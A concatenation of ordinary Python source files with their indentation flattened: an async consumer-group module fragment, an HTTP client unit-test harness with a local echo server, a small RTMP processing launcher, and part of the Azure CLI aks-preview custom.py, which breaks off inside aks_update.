consumer_group = getattr(sys.modules[__name__], '%sConsumerGroup' % class_name_prefix)()
consumer_group.add_consumer(actor.consumer)
consumer_groups[actor.consumer.topic] = consumer_group
else:
consumer_groups[actor.consumer.topic].add_consumer(actor.consumer)
for consumer_group in AsyncConsumerGroup.groups:
t = threading.Thread(target=consumer_group.consume, args=(), kwargs={})
t.daemon = True
t.start()
def stop_loops():
for actor in AsyncActor.actors:
actor.stop = True
for consumer_group in AsyncConsumerGroup.groups:
consumer_group.stop = True
AsyncService.services = []
AsyncActor.actors = []
AsyncProducer.producers = []
AsyncConsumer.consumers = []
AsyncConsumerGroup.groups = []
|
freetests.py
|
#!/usr/bin/env python3
# coding: utf-8
# Copyright 2013 Abram Hindle
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# run python freetests.py
import unittest
import httpclient
import http.server
import threading
import socketserver
import random
import time
import urllib.parse
import json
BASEHOST = '127.0.0.1'
BASEPORT = 27600 + random.randint(1,100)
httpclass = httpclient
#import mysolution
#httpclass = mysolution
# Sorry but in Python this comes out of the box!
class MyHTTPHandler(http.server.BaseHTTPRequestHandler):
post = None
get = None
def do_POST(self):
try:
if (self.post == None):
return None
else:
return self.post()
except Exception as e:
print("Exception %s\n" % e)
raise e
def do_GET(self):
try:
print("GET %s\n" % self.path)
if (self.get == None):
return None
else:
return self.get()
except Exception as e:
print("Exception %s\n" % e)
raise e
def make_http_server(host = BASEHOST, port = BASEPORT):
return http.server.HTTPServer( (host, port) , MyHTTPHandler)
# always returns 404
def nothing_available(self):
self.send_error(404, "File not found")
self.end_headers()
self.wfile.write(bytes("","utf-8"))
# repeats your path back
def echo_path_get(self):
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write(bytes("%s\n" % self.path,"utf-8"))
# repeats your post back as json
def echo_post(self):
length = int(self.headers['Content-Length'])
post_data = urllib.parse.parse_qs(self.rfile.read(length).decode('utf-8'))
self.send_response(200)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(bytes(json.dumps(post_data),"utf-8"))
def header_check(self):
response = 200
errors = []
if 'Host' not in self.headers:
response = 400
errors.append("No Host header found")
self.send_response(response)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(bytes(json.dumps(errors),"utf-8"))
def die_on_method(self):
response = 405
errors = []
errors.append("Method Not Allowed")
if 'Host' not in self.headers:
errors.append("No Host header found")
self.send_response(response)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(bytes(json.dumps(errors),"utf-8"))
def post_header_check(self):
response = 200
errors = []
if 'Host' not in self.headers:
response = 400
errors.append("No Host header found")
if 'Content-length' not in self.headers:
response = 400
errors.append("No Content-Length header found")
self.send_response(response)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(bytes(json.dumps(errors),"utf-8"))
class TestHTTPClient(unittest.TestCase):
httpd = None
running = False
@classmethod
def setUpClass(self):
'''Cache the httpd server and run it as a thread'''
if (TestHTTPClient.httpd == None):
try:
self.thread = threading.Thread(target=self.run_server).start()
time.sleep(1)
except Exception as e:
print(e)
print("setUP: Thread died")
raise(e)
@classmethod
def run_server(self):
'''run the httpd server in a thread'''
try:
socketserver.TCPServer.allow_reuse_address = True
http.server.HTTPServer.allow_reuse_address = True
TestHTTPClient.httpd = make_http_server()
print("HTTP UP!\n")
TestHTTPClient.httpd.serve_forever()
print("HTTP has been shutdown!\n")
except Exception as e:
print(e)
print("run_server: Thread died")
def test404GET(self):
'''Test against 404 errors'''
MyHTTPHandler.get = nothing_available
http = httpclass.HTTPClient()
req = http.GET("http://%s:%d/49872398432" % (BASEHOST,BASEPORT) )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 404)
def test404POST(self):
'''Test against 404 errors'''
MyHTTPHandler.post = nothing_available
http = httpclass.HTTPClient()
req = http.POST("http://%s:%d/49872398432" % (BASEHOST,BASEPORT) )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 404)
def testGET(self):
'''Test HTTP GET'''
MyHTTPHandler.get = echo_path_get
http = httpclass.HTTPClient()
path = "abcdef/gjkd/dsadas"
url = "http://%s:%d/%s" % (BASEHOST,BASEPORT, path)
req = http.GET( url )
# print(f"the req is.....:\n{req.body}")
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 200)
# a = "Data: [%s] " % req.body
# print(f"\n\n\nI want:\n{req.body.find(path)>=0}\nTo be equal to:\n{a}\n\n\n")
self.assertTrue(req.body.find(path)>=0, "Data: [%s] " % req.body)
def testGETHeaders(self):
'''Test HTTP GET Headers'''
MyHTTPHandler.get = header_check
MyHTTPHandler.post = die_on_method
http = httpclass.HTTPClient()
path = "abcdef/gjkd/dsadas"
url = "http://%s:%d/%s" % (BASEHOST,BASEPORT, path)
req = http.GET( url )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 200)
def testPOSTHeaders(self):
'''Test HTTP POST Headers'''
MyHTTPHandler.post = post_header_check
MyHTTPHandler.get = die_on_method
http = httpclass.HTTPClient()
path = "abcdef/gjkd/dsadas"
url = "http://%s:%d/%s" % (BASEHOST,BASEPORT, path)
req = http.POST( url )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 200,"Code is %s but I wanted a 200 OK" % req.code)
# consider disabling this test until everything else works
def testInternetGets(self):
'''Test HTTP Get in the wild, these webservers are far less
forgiving'''
MyHTTPHandler.get = echo_path_get
http = httpclass.HTTPClient()
urls = [
"http://www.cs.ualberta.ca/",
"http://softwareprocess.es/static/SoftwareProcess.es.html",
"http://c2.com/cgi/wiki?CommonLispHyperSpec&P=2",
"http://slashdot.org"
]
for url in urls:
try:
req = http.GET( url )
except Exception as e:
print("An Exception was thrown for %s" % url)
self.assertTrue( False, "An Exception was thrown for %s %s" % (url,e))
self.assertTrue(req != None, "None Returned! %s" % url)
self.assertTrue(req.code == 200 or
req.code == 301 or
req.code == 302,
"Code: %s for %s" % (req.code, url))
if (req.code == 200):
self.assertTrue(req.body.find("DOCTYPE")>=0 or
req.body.find("<body")>=0 ,
"%s Data: [%s] " % (url,req.body))
def testPOST(self):
'''Test HTTP POST with an echo server'''
MyHTTPHandler.post = echo_post
http = httpclass.HTTPClient()
path = "post_echoer"
url = "http://%s:%d/%s" % (BASEHOST,BASEPORT, path)
args = {'a':'aaaaaaaaaaaaa',
'b':'bbbbbbbbbbbbbbbbbbbbbb',
'c':'c',
'd':'012345\r67890\n2321321\n\r'}
# args = {'a':'aaaa',
# 'b':'bbb',
# 'c':'c',
# 'd':'01'}
print("Sending POST!")
req = http.POST( url, args=args )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 200)
print("Test Post Body: [%s]" % req.body)
outargs = json.loads(req.body)
print(outargs.__class__)
for key in args:
self.assertTrue(args[key] == outargs[key][0], "Key [%s] not found" % key)
for key in outargs:
self.assertTrue(args[key] == outargs[key][0], "Key [%s] not found" % key)
@classmethod
def tearDownClass(self):
if (TestHTTPClient.httpd!=None):
print("HTTP Shutdown in tearDown\n")
TestHTTPClient.httpd.shutdown()
TestHTTPClient.httpd.server_close()
time.sleep(1)
def test_test_webserver():
print("http://%s:%d/dsadsadsadsa\n" % (BASEHOST,BASEPORT) )
MyHTTPHandler.get = echo_path_get
MyHTTPHandler.post = echo_post
httpd = make_http_server()
try:
httpd.serve_forever()
finally:
httpd.shutdown()
if __name__ == '__main__':
unittest.main()
|
zzj_monitor_rtmp.py
|
import os
import os.path as osp
import time
import multiprocessing as mp
from process_rtmp import *
max_q_size = 1
queues = [mp.Queue(maxsize=2) for i in range(0, max_q_size+1) ]
processes = []
processes.append(mp.Process(target=load_im, args=(queues[0],None)))
processes.append(mp.Process(target=first_layer_detection, args=(queues[0], queues[1] )))
#processes.append(mp.Process(target=post_process, args=(queues[1], None )))
for process in processes:
process.daemon = True
process.start()
for process in processes:
process.join()
|
custom.py
|
# pylint: disable=too-many-lines
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import base64
import binascii
import datetime
import errno
import json
import os
import os.path
import platform
import re
import ssl
import stat
import subprocess
import sys
import tempfile
import threading
import time
import uuid
import webbrowser
from math import isnan
import colorama # pylint: disable=import-error
import yaml # pylint: disable=import-error
from azure.cli.core.api import get_config_dir
from azure.cli.core.azclierror import (
ArgumentUsageError,
InvalidArgumentValueError,
)
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core.commands.client_factory import (
get_mgmt_service_client,
get_subscription_id,
)
from azure.cli.core.util import (
get_file_json,
in_cloud_console,
read_file_content,
sdk_no_wait,
shell_safe_json_parse,
)
from azure.graphrbac.models import (
ApplicationCreateParameters,
KeyCredential,
PasswordCredential,
ServicePrincipalCreateParameters,
)
from dateutil.parser import parse # pylint: disable=import-error
from dateutil.relativedelta import relativedelta # pylint: disable=import-error
from knack.log import get_logger
from knack.prompting import NoTTYException, prompt_pass, prompt_y_n
from knack.util import CLIError
from msrestazure.azure_exceptions import CloudError
from six.moves.urllib.error import URLError # pylint: disable=import-error
from six.moves.urllib.request import urlopen # pylint: disable=import-error
from tabulate import tabulate # pylint: disable=import-error
from azext_aks_preview._client_factory import CUSTOM_MGMT_AKS_PREVIEW
from ._client_factory import (
cf_agent_pools,
cf_container_registry_service,
cf_nodepool_snapshots_client,
cf_mc_snapshots_client,
cf_storage,
get_auth_management_client,
get_graph_rbac_management_client,
get_msi_client,
get_resource_by_name,
)
from ._consts import (
ADDONS,
ADDONS_DESCRIPTIONS,
CONST_ACC_SGX_QUOTE_HELPER_ENABLED,
CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME,
CONST_AZURE_POLICY_ADDON_NAME,
CONST_CONFCOM_ADDON_NAME,
CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME,
CONST_INGRESS_APPGW_ADDON_NAME,
CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID,
CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME,
CONST_INGRESS_APPGW_SUBNET_CIDR,
CONST_INGRESS_APPGW_SUBNET_ID,
CONST_INGRESS_APPGW_WATCH_NAMESPACE,
CONST_KUBE_DASHBOARD_ADDON_NAME,
CONST_MANAGED_IDENTITY_OPERATOR_ROLE,
CONST_MANAGED_IDENTITY_OPERATOR_ROLE_ID,
CONST_MONITORING_ADDON_NAME,
CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID,
CONST_MONITORING_USING_AAD_MSI_AUTH,
CONST_OPEN_SERVICE_MESH_ADDON_NAME,
CONST_ROTATION_POLL_INTERVAL,
CONST_SCALE_DOWN_MODE_DELETE,
CONST_SCALE_SET_PRIORITY_REGULAR,
CONST_SCALE_SET_PRIORITY_SPOT,
CONST_SECRET_ROTATION_ENABLED,
CONST_SPOT_EVICTION_POLICY_DELETE,
CONST_VIRTUAL_NODE_ADDON_NAME,
CONST_VIRTUAL_NODE_SUBNET_NAME,
)
from ._helpers import (
_trim_fqdn_name_containing_hcp,
)
from ._podidentity import (
_ensure_managed_identity_operator_permission,
_ensure_pod_identity_addon_is_enabled,
_fill_defaults_for_pod_identity_profile,
_update_addon_pod_identity,
)
from ._resourcegroup import get_rg_location
from ._roleassignments import (
add_role_assignment,
build_role_scope,
create_role_assignment,
resolve_object_id,
resolve_role_id,
)
from .addonconfiguration import (
add_ingress_appgw_addon_role_assignment,
add_monitoring_role_assignment,
add_virtual_node_role_assignment,
enable_addons,
ensure_container_insights_for_monitoring,
ensure_default_log_analytics_workspace_for_monitoring,
sanitize_loganalytics_ws_resource_id,
)
from .maintenanceconfiguration import (
aks_maintenanceconfiguration_update_internal,
)
from .vendored_sdks.azure_mgmt_preview_aks.v2022_04_02_preview.models import (
AgentPool,
AgentPoolUpgradeSettings,
ContainerServiceStorageProfileTypes,
CreationData,
KubeletConfig,
LinuxOSConfig,
ManagedClusterAddonProfile,
ManagedClusterHTTPProxyConfig,
ManagedClusterPodIdentity,
ManagedClusterPodIdentityException,
PowerState,
Snapshot,
ManagedClusterSnapshot,
SysctlConfig,
UserAssignedIdentity,
)
logger = get_logger(__name__)
def which(binary):
path_var = os.getenv('PATH')
if platform.system() == 'Windows':
binary = binary + '.exe'
parts = path_var.split(';')
else:
parts = path_var.split(':')
for part in parts:
bin_path = os.path.join(part, binary)
if os.path.exists(bin_path) and os.path.isfile(bin_path) and os.access(bin_path, os.X_OK):
return bin_path
return None
def wait_then_open(url):
"""
Waits for a bit then opens a URL. Useful for waiting for a proxy to come up, and then open the URL.
"""
for _ in range(1, 10):
try:
urlopen(url, context=_ssl_context())
except URLError:
time.sleep(1)
break
webbrowser.open_new_tab(url)
def wait_then_open_async(url):
"""
Spawns a thread that waits for a bit then opens a URL.
"""
t = threading.Thread(target=wait_then_open, args=({url}))
t.daemon = True
t.start()
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'):
try:
# added in python 2.7.13 and 3.6
return ssl.SSLContext(ssl.PROTOCOL_TLS)
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret):
# use get_progress_controller
hook = cli_ctx.get_progress_controller(True)
hook.add(messsage='Creating service principal', value=0, total_val=1.0)
logger.info('Creating service principal')
# always create application with 5 years expiration
start_date = datetime.datetime.utcnow()
end_date = start_date + relativedelta(years=5)
result = create_application(rbac_client.applications, name, url, [url], password=client_secret,
start_date=start_date, end_date=end_date)
service_principal = result.app_id # pylint: disable=no-member
for x in range(0, 10):
hook.add(message='Creating service principal',
value=0.1 * x, total_val=1.0)
try:
create_service_principal(
cli_ctx, service_principal, rbac_client=rbac_client)
break
# TODO figure out what exception AAD throws here sometimes.
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
time.sleep(2 + 2 * x)
else:
return False
hook.add(message='Finished service principal creation',
value=1.0, total_val=1.0)
logger.info('Finished service principal creation')
return service_principal
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
logger.info('Waiting for AAD role to delete')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to delete',
value=0.1 * x, total_val=1.0)
try:
delete_role_assignments(cli_ctx,
role=role,
assignee=service_principal,
scope=scope)
break
except CLIError as ex:
raise ex
except CloudError as ex:
logger.info(ex)
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
logger.info('AAD role deletion done')
return True
def _get_default_dns_prefix(name, resource_group_name, subscription_id):
# Use subscription id to provide uniqueness and prevent DNS name clashes
name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10]
if not name_part[0].isalpha():
name_part = (str('a') + name_part)[0:10]
resource_group_part = re.sub(
'[^A-Za-z0-9-]', '', resource_group_name)[0:16]
return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6])
# pylint: disable=too-many-locals
def store_acs_service_principal(subscription_id, client_secret, service_principal,
file_name='acsServicePrincipal.json'):
obj = {}
if client_secret:
obj['client_secret'] = client_secret
if service_principal:
obj['service_principal'] = service_principal
config_path = os.path.join(get_config_dir(), file_name)
full_config = load_service_principals(config_path=config_path)
if not full_config:
full_config = {}
full_config[subscription_id] = obj
with os.fdopen(os.open(config_path, os.O_RDWR | os.O_CREAT | os.O_TRUNC, 0o600),
'w+') as spFile:
json.dump(full_config, spFile)
def load_acs_service_principal(subscription_id, file_name='acsServicePrincipal.json'):
config_path = os.path.join(get_config_dir(), file_name)
config = load_service_principals(config_path)
if not config:
return None
return config.get(subscription_id)
def load_service_principals(config_path):
if not os.path.exists(config_path):
return None
fd = os.open(config_path, os.O_RDONLY)
try:
with os.fdopen(fd) as f:
return shell_safe_json_parse(f.read())
except: # pylint: disable=bare-except
return None
def create_application(client, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password=password, key_value=key_value, key_type=key_type,
key_usage=key_usage, start_date=start_date, end_date=end_date)
app_create_param = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants,
display_name=display_name,
identifier_uris=identifier_uris,
homepage=homepage,
reply_urls=reply_urls,
key_credentials=key_creds,
password_credentials=password_creds)
try:
return client.create(app_create_param)
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def _build_application_creds(password=None, key_value=None, key_type=None,
key_usage=None, start_date=None, end_date=None):
if password and key_value:
raise CLIError(
'specify either --password or --key-value, but not both.')
if not start_date:
start_date = datetime.datetime.utcnow()
elif isinstance(start_date, str):
start_date = parse(start_date)
if not end_date:
end_date = start_date + relativedelta(years=1)
elif isinstance(end_date, str):
end_date = parse(end_date)
key_type = key_type or 'AsymmetricX509Cert'
key_usage = key_usage or 'Verify'
password_creds = None
key_creds = None
if password:
password_creds = [PasswordCredential(start_date=start_date, end_date=end_date,
key_id=str(uuid.uuid4()), value=password)]
elif key_value:
key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value,
key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)]
return (password_creds, key_creds)
def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None):
if rbac_client is None:
rbac_client = get_graph_rbac_management_client(cli_ctx)
if resolve_app:
try:
uuid.UUID(identifier)
result = list(rbac_client.applications.list(
filter="appId eq '{}'".format(identifier)))
except ValueError:
result = list(rbac_client.applications.list(
filter="identifierUris/any(s:s eq '{}')".format(identifier)))
if not result: # assume we get an object id
result = [rbac_client.applications.get(identifier)]
app_id = result[0].app_id
else:
app_id = identifier
return rbac_client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True))
def delete_role_assignments(cli_ctx, ids=None, assignee=None, role=None, resource_group_name=None,
scope=None, include_inherited=False, yes=None):
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
ids = ids or []
if ids:
if assignee or role or resource_group_name or scope or include_inherited:
raise CLIError(
'When assignment ids are used, other parameter values are not required')
for i in ids:
assignments_client.delete_by_id(i)
return
if not any([ids, assignee, role, resource_group_name, scope, assignee, yes]):
msg = 'This will delete all role assignments under the subscription. Are you sure?'
if not prompt_y_n(msg, default="n"):
return
scope = build_role_scope(resource_group_name, scope,
assignments_client.config.subscription_id)
assignments = _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited,
include_groups=False)
if assignments:
for a in assignments:
assignments_client.delete_by_id(a.id)
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
logger.info('Waiting for AAD role to delete')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to delete',
value=0.1 * x, total_val=1.0)
try:
delete_role_assignments(cli_ctx,
role=role,
assignee=service_principal,
scope=scope)
break
except CLIError as ex:
raise ex
except CloudError as ex:
logger.info(ex)
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
logger.info('AAD role deletion done')
return True
def _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited, include_groups):
assignee_object_id = None
if assignee:
assignee_object_id = resolve_object_id(cli_ctx, assignee)
# always use "scope" if provided, so we can get assignments beyond subscription e.g. management groups
if scope:
assignments = list(assignments_client.list_for_scope(
scope=scope, filter='atScope()'))
elif assignee_object_id:
if include_groups:
f = "assignedTo('{}')".format(assignee_object_id)
else:
f = "principalId eq '{}'".format(assignee_object_id)
assignments = list(assignments_client.list(filter=f))
else:
assignments = list(assignments_client.list())
if assignments:
assignments = [a for a in assignments if (
not scope or
include_inherited and re.match(_get_role_property(a, 'scope'), scope, re.I) or
_get_role_property(a, 'scope').lower() == scope.lower()
)]
if role:
role_id = resolve_role_id(role, scope, definitions_client)
assignments = [i for i in assignments if _get_role_property(
i, 'role_definition_id') == role_id]
if assignee_object_id:
assignments = [i for i in assignments if _get_role_property(
i, 'principal_id') == assignee_object_id]
return assignments
def _get_role_property(obj, property_name):
if isinstance(obj, dict):
return obj[property_name]
return getattr(obj, property_name)
def subnet_role_assignment_exists(cli_ctx, scope):
network_contributor_role_id = "4d97b98b-1d4f-4787-a291-c67834d212e7"
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope == scope and i.role_definition_id.endswith(network_contributor_role_id):
return True
return False
_re_user_assigned_identity_resource_id = re.compile(
r'/subscriptions/(.*?)/resourcegroups/(.*?)/providers/microsoft.managedidentity/userassignedidentities/(.*)',
flags=re.IGNORECASE)
def _get_user_assigned_identity(cli_ctx, resource_id):
resource_id = resource_id.lower()
match = _re_user_assigned_identity_resource_id.search(resource_id)
if match:
subscription_id = match.group(1)
resource_group_name = match.group(2)
identity_name = match.group(3)
msi_client = get_msi_client(cli_ctx, subscription_id)
try:
identity = msi_client.user_assigned_identities.get(resource_group_name=resource_group_name,
resource_name=identity_name)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError("Identity {} not found.".format(resource_id))
raise CLIError(ex.message)
return identity
raise CLIError(
"Cannot parse identity name from provided resource id {}.".format(resource_id))
_re_snapshot_resource_id = re.compile(
r'/subscriptions/(.*?)/resourcegroups/(.*?)/providers/microsoft.containerservice/snapshots/(.*)',
flags=re.IGNORECASE)
_re_mc_snapshot_resource_id = re.compile(
r'/subscriptions/(.*?)/resourcegroups/(.*?)/providers/microsoft.containerservice/managedclustersnapshots/(.*)',
flags=re.IGNORECASE)
def _get_snapshot(cli_ctx, snapshot_id):
snapshot_id = snapshot_id.lower()
match = _re_snapshot_resource_id.search(snapshot_id)
if match:
subscription_id = match.group(1)
resource_group_name = match.group(2)
snapshot_name = match.group(3)
snapshot_client = cf_nodepool_snapshots_client(
cli_ctx, subscription_id=subscription_id)
try:
snapshot = snapshot_client.get(resource_group_name, snapshot_name)
except CloudError as ex:
if 'was not found' in ex.message:
raise InvalidArgumentValueError(
"Snapshot {} not found.".format(snapshot_id))
raise CLIError(ex.message)
return snapshot
raise InvalidArgumentValueError(
"Cannot parse snapshot name from provided resource id {}.".format(snapshot_id))
def _get_cluster_snapshot(cli_ctx, snapshot_id):
snapshot_id = snapshot_id.lower()
match = _re_mc_snapshot_resource_id.search(snapshot_id)
if match:
subscription_id = match.group(1)
resource_group_name = match.group(2)
snapshot_name = match.group(3)
snapshot_client = cf_mc_snapshots_client(
cli_ctx, subscription_id=subscription_id)
try:
snapshot = snapshot_client.get(resource_group_name, snapshot_name)
except CloudError as ex:
if 'was not found' in ex.message:
raise InvalidArgumentValueError(
"Managed cluster snapshot {} not found.".format(snapshot_id))
raise CLIError(ex.message)
return snapshot
raise InvalidArgumentValueError(
"Cannot parse snapshot name from provided resource id {}.".format(snapshot_id))
def aks_browse(
cmd,
client,
resource_group_name,
name,
disable_browser=False,
listen_address="127.0.0.1",
listen_port="8001",
):
from azure.cli.command_modules.acs.custom import _aks_browse
return _aks_browse(
cmd,
client,
resource_group_name,
name,
disable_browser,
listen_address,
listen_port,
CUSTOM_MGMT_AKS_PREVIEW,
)
def _trim_nodepoolname(nodepool_name):
if not nodepool_name:
return "nodepool1"
return nodepool_name[:12]
def aks_maintenanceconfiguration_list(
cmd,
client,
resource_group_name,
cluster_name
):
return client.list_by_managed_cluster(resource_group_name, cluster_name)
def aks_maintenanceconfiguration_show(
cmd,
client,
resource_group_name,
cluster_name,
config_name
):
logger.warning('resource_group_name: %s, cluster_name: %s, config_name: %s ',
resource_group_name, cluster_name, config_name)
return client.get(resource_group_name, cluster_name, config_name)
def aks_maintenanceconfiguration_delete(
cmd,
client,
resource_group_name,
cluster_name,
config_name
):
logger.warning('resource_group_name: %s, cluster_name: %s, config_name: %s ',
resource_group_name, cluster_name, config_name)
return client.delete(resource_group_name, cluster_name, config_name)
def aks_maintenanceconfiguration_add(
cmd,
client,
resource_group_name,
cluster_name,
config_name,
config_file,
weekday,
start_hour
):
configs = client.list_by_managed_cluster(resource_group_name, cluster_name)
for config in configs:
if config.name == config_name:
raise CLIError("Maintenance configuration '{}' already exists, please try a different name, "
"use 'aks maintenanceconfiguration list' to get current list of maitenance configurations".format(config_name))
return aks_maintenanceconfiguration_update_internal(cmd, client, resource_group_name, cluster_name, config_name, config_file, weekday, start_hour)
def aks_maintenanceconfiguration_update(
cmd,
client,
resource_group_name,
cluster_name,
config_name,
config_file,
weekday,
start_hour
):
configs = client.list_by_managed_cluster(resource_group_name, cluster_name)
found = False
for config in configs:
if config.name == config_name:
found = True
break
if not found:
raise CLIError("Maintenance configuration '{}' doesn't exist."
"use 'aks maintenanceconfiguration list' to get current list of maitenance configurations".format(config_name))
return aks_maintenanceconfiguration_update_internal(cmd, client, resource_group_name, cluster_name, config_name, config_file, weekday, start_hour)
# pylint: disable=unused-argument,too-many-locals
def aks_create(cmd,
client,
resource_group_name,
name,
ssh_key_value,
dns_name_prefix=None,
location=None,
admin_username="azureuser",
windows_admin_username=None,
windows_admin_password=None,
enable_ahub=False,
kubernetes_version='',
node_vm_size=None,
node_osdisk_type=None,
node_osdisk_size=0,
node_osdisk_diskencryptionset_id=None,
node_count=3,
nodepool_name="nodepool1",
nodepool_tags=None,
nodepool_labels=None,
service_principal=None, client_secret=None,
no_ssh_key=False,
disable_rbac=None,
enable_rbac=None,
enable_vmss=None,
vm_set_type=None,
skip_subnet_role_assignment=False,
os_sku=None,
enable_fips_image=False,
enable_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
network_plugin=None,
network_policy=None,
pod_cidr=None,
service_cidr=None,
pod_cidrs=None,
service_cidrs=None,
ip_families=None,
dns_service_ip=None,
docker_bridge_address=None,
load_balancer_sku=None,
load_balancer_managed_outbound_ip_count=None,
load_balancer_managed_outbound_ipv6_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
nat_gateway_managed_outbound_ip_count=None,
nat_gateway_idle_timeout=None,
outbound_type=None,
enable_addons=None,
workspace_resource_id=None,
enable_msi_auth_for_monitoring=False,
min_count=None,
max_count=None,
vnet_subnet_id=None,
pod_subnet_id=None,
ppg=None,
max_pods=0,
aad_client_app_id=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_tenant_id=None,
tags=None,
node_zones=None,
zones=None,
enable_node_public_ip=False,
node_public_ip_prefix_id=None,
generate_ssh_keys=False, # pylint: disable=unused-argument
enable_pod_security_policy=False,
node_resource_group=None,
uptime_sla=False,
attach_acr=None,
enable_private_cluster=False,
private_dns_zone=None,
enable_managed_identity=True,
fqdn_subdomain=None,
disable_public_fqdn=False,
api_server_authorized_ip_ranges=None,
aks_custom_headers=None,
appgw_name=None,
appgw_subnet_prefix=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_aad=False,
enable_azure_rbac=False,
aad_admin_group_object_ids=None,
aci_subnet_name=None,
enable_sgxquotehelper=False,
kubelet_config=None,
linux_os_config=None,
http_proxy_config=None,
assign_identity=None,
auto_upgrade_channel=None,
enable_pod_identity=False,
enable_pod_identity_with_kubenet=False,
# NOTE: for workload identity flags, we need to know if it's set to True/False or not set (None)
enable_workload_identity=None,
enable_encryption_at_host=False,
enable_ultra_ssd=False,
edge_zone=None,
enable_secret_rotation=False,
disable_disk_driver=None,
disable_file_driver=None,
disable_snapshot_controller=None,
rotation_poll_interval=None,
disable_local_accounts=False,
no_wait=False,
assign_kubelet_identity=None,
workload_runtime=None,
gpu_instance_profile=None,
enable_windows_gmsa=False,
gmsa_dns_server=None,
gmsa_root_domain_name=None,
snapshot_id=None,
cluster_snapshot_id=None,
enable_oidc_issuer=False,
host_group_id=None,
crg_id=None,
message_of_the_day=None,
enable_azure_keyvault_kms=False,
azure_keyvault_kms_key_id=None,
enable_apiserver_vnet_integration=False,
apiserver_subnet_id=None,
yes=False):
# DO NOT MOVE: get all the original parameters and save them as a dictionary
raw_parameters = locals()
from azure.cli.command_modules.acs._consts import DecoratorEarlyExitException
from azure.cli.command_modules.acs.decorator import AKSParamDict
from .decorator import AKSPreviewCreateDecorator
# decorator pattern
aks_create_decorator = AKSPreviewCreateDecorator(
cmd=cmd,
client=client,
raw_parameters=AKSParamDict(raw_parameters),
resource_type=CUSTOM_MGMT_AKS_PREVIEW,
)
try:
# construct mc profile
mc = aks_create_decorator.construct_mc_preview_profile()
except DecoratorEarlyExitException:
# exit gracefully
return None
# send request to create a real managed cluster
return aks_create_decorator.create_mc_preview(mc)
def aks_update(cmd, # pylint: disable=too-many-statements,too-many-branches,too-many-locals
client,
resource_group_name,
name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
